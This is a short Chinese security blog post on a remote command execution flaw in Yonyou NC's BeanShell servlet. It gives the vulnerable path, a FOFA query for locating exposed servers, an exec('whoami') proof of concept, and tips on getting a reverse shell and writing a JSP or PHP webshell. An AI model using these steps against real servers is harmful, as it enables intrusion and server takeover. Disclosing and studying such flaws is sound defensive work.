Adminxe's Blog | 低调求发展 - 潜心习安全 ,技术永无止境 | 谢谢您对本站的支持,有什么问题或者建议请及时联系:点击这里给我发消息

用友 NC bsh.servlet.BshServlet 远程命令执行漏洞

渗透测试 Adminxe 12646℃ 0评论

0x00 漏洞描述

用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限

看到这个beanshell,就会想起来一个洞,是泛微OA的beanshell

0x01 漏洞影响

用友 NC

0x02 FOFA

“用友网络”

0x03 漏洞复现

漏洞位置

/servlet/~ic/bsh.servlet.BshServlet

将POC修改为:

exec(“whoami”)

0x04 利用总结

1、使用反弹方式进行获取权限

2、关于webshell:NC让我回想起实战时的泛微OA,如果jsp文件写shell不成功的时候,可以尝试下写入php,会有意想不到的收获。

转载请注明:Adminxe's Blog » 用友 NC bsh.servlet.BshServlet 远程命令执行漏洞

喜欢 (29)or分享 (0)
发表我的评论
取消评论
表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址